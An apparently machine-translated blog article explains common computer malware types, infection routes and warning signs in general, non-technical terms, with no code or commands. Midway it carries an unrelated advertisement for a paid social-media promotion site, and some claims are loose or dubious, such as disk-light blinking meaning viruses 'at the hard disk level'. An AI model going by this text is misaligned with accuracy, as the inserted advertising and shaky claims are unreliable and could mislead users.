Worms try to write for the most popular programs. For example, now the most popular browser is Chrome, so scammers will try to write under it and make malicious code on sites under it. Because it is often more interesting to infect thousands of users who use a popular program than a hundred with an unpopular program. Although chrome is constantly improving protection.
The best protection against network worms th is to update your programs and your operating system. Many neglect updates, which they often regret.
A few years ago, I noticed the following worm.

But he obviously did not get through the Internet, but most likely through a pirated disk. The essence of his work was as follows - he created, as it were, a copy of each folder on a computer or on a flash drive. But in fact, he created not a similar folder, but an exe file. When you click on such an exe file, it spread even more throughout the system. And then you just got rid of it, you come to a friend with a flash drive, throw off music from him, and you return with a flash drive infected with such a worm and again you had to remove it. Whether this virus caused any other harm to the system, I do not know, but soon this virus ceased to exist.

The main types of viruses

In fact, there are many types and varieties of computer threats. And it's impossible to see everything. Therefore, we will consider the most common in recent times and the most unpleasant.
Viruses are:
— File- located in an infected file, activated when the user turns on this program, they cannot be activated themselves.
— Boot- can be loaded windows boot hitting autoload, when inserting a flash drive or the like.
- macro viruses - this is various scripts which may be on the site, may send them to you by mail or in Word and Excel documents, perform certain functions inherent in the computer. Exploit vulnerabilities in your programs.

Types of viruses.
-Trojans
— Spies
- Ransomware
— Vandals
— Rootkits
— Botnet
— Keyloggers
These are the most basic types of threats that you may encounter. But in reality there are many more.
Some viruses can even be combined and contain several types of these threats at once.
- Trojans. The name comes from the Trojan horse. Penetrates into your computer under the guise of harmless programs, then it can open access to your computer or send your passwords to the owner.
Lately, Trojans called stealers have become widespread. They can steal saved passwords in your browser, in game mail clients. Immediately after launch, it copies your passwords and sends your passwords to an email or hosting to an attacker. It remains for him to collect your data, then they are either sold or used for their own purposes.
— Spies (spyware) track user actions. What sites the user visits or what the user does on their computer.
- Ransomware. These include Winlockers. The program completely or completely blocks access to the computer and requires money for unlocking, for example, put it on an account or so on. In no case should you send money if you fall for this. The computer will not be unlocked for you, and you will lose money. You have a direct road to the Drweb website, where you can find how to unlock many winlockers by entering a specific code or performing some actions. Some winlockers can disappear for example in a day.
— Vandals can block access to antivirus websites and access to antivirus and many other programs.
— Rootkits(rootkit) - hybrid viruses. They may contain various viruses. They can access your PC, and the person will have full access to your computer, and they can merge into the kernel level of your OS. Came from the world of Unix systems. They can mask various viruses, collect data about the computer and about all computer processes.
— Botnet quite a nasty thing. Botnets are huge networks of infected "zombie" computers that can be used to ddos ​​websites and other cyber attacks using the infected computers. This type is very common and hard to detect, even antivirus companies may not know about their existence for a long time. A lot of people can be infected with them and not even suspect it. You are no exception, and maybe even me.
— Keyloggers(keylogger) - keyloggers. They intercept everything that you enter from the keyboard (websites, passwords) and send them to the owner.

Ways of infection with computer viruses.

main routes of infection.
— Vulnerability of the operating system.

— Vulnerability in the browser

- The quality of the antivirus is lame

— User Stupidity

- Removable media.
OS vulnerability- no matter how hard they try to rivet protection for the OS, security holes are found over time. Most viruses are written under windows as it is the most popular operating system. The best defense is to keep your operating system up to date and try to use the newest version.
Browsers- This happens due to browser vulnerabilities, especially if they are old again. Treated the same frequent updates. There may also be problems if you download browser plugins from third-party resources.
Antivirus- free antiviruses that have less functionality, unlike paid ones. Although the paid ones do not give 100 results in defense and misfire. But it is desirable to have at least a free antivirus. I already wrote about free antiviruses in this.
User Stupidity— clicks on banners, follow suspicious links from emails, etc., install software from suspicious places.
Removable media— viruses can be installed automatically from infected and specially prepared flash drives and other removable media. Not so long ago, the world heard about the BadUSB vulnerability.

https://avi1.ru/ - you can buy a very inexpensive promotion in social networks on this site. You will also receive really profitable offers for acquiring resources for your pages.

Types of infected objects.

Files- They infect your programs, system and regular files.
Boot sectors- resident viruses. They infect, as the name implies, the boot sectors of the computer, attribute their code to the computer's autoload and run at startup operating system. Sometimes they are well disguised, which is difficult to remove from startup.
macros — word documents, excel and the like. Using macros and vulnerabilities in Microsoft office tools introduces its own malicious code into your operating system.

Signs of a computer virus infection.

It is not a fact that the appearance of some of these signs means the presence of a virus in the system. But if they are, it is recommended to check your computer with an antivirus or contact a specialist.
One of the common symptoms is it's a heavy load on the computer. When your computer is running slowly, although you don’t seem to have anything turned on, programs that can heavily load your computer. But if you have an antivirus, note that antiviruses themselves load the computer very well. And in the absence of such software that can load, then more likely there are viruses. In general, I advise you to reduce the number of startup programs in autorun to begin with.

It can also be one of the signs of infection.
But not all viruses can heavily load the system, some are almost difficult to notice changes.
System errors. Drivers stop working, some programs start to work incorrectly or often crash with an error, but let's say this was not noticed before. Or programs start to reboot frequently. Of course, this happens due to antiviruses, for example, the antivirus deleted it by mistake, considering the system file to be malicious, or deleted a really infected file, but it was associated with system files programs and removal caused such errors.

The appearance of ads in browsers or even banners start appearing on the desktop.
The appearance of non-standard sounds when the computer is running (squeak, clicks for no reason, and the like).
CD/DVD drive opens by itself, or just starts to read the disc, although the disc is not there.
Prolonged turning on or off of the computer.
Hijacking your passwords. If you notice that various spam is being sent on your behalf, from your mailbox or social network page, as a possibility that a virus has entered your computer and transferred passwords to the owner, if you notice this, I recommend that you check with an antivirus without fail (although it’s not a fact that this is exactly the attacker got your password).
Frequent hard disk access. Every computer has an indicator that blinks when you use various programs or when you copy, download, move files. For example, your computer is just turned on but no programs are being used, but the indicator starts blinking frequently, supposedly programs are being used. These are already viruses at the hard disk level.

That's actually considered computer viruses that you can meet on the Internet. But in fact, there are many times more of them, and it is not possible to fully protect yourself, unless you do not use the Internet, do not buy disks, and do not turn on the computer at all.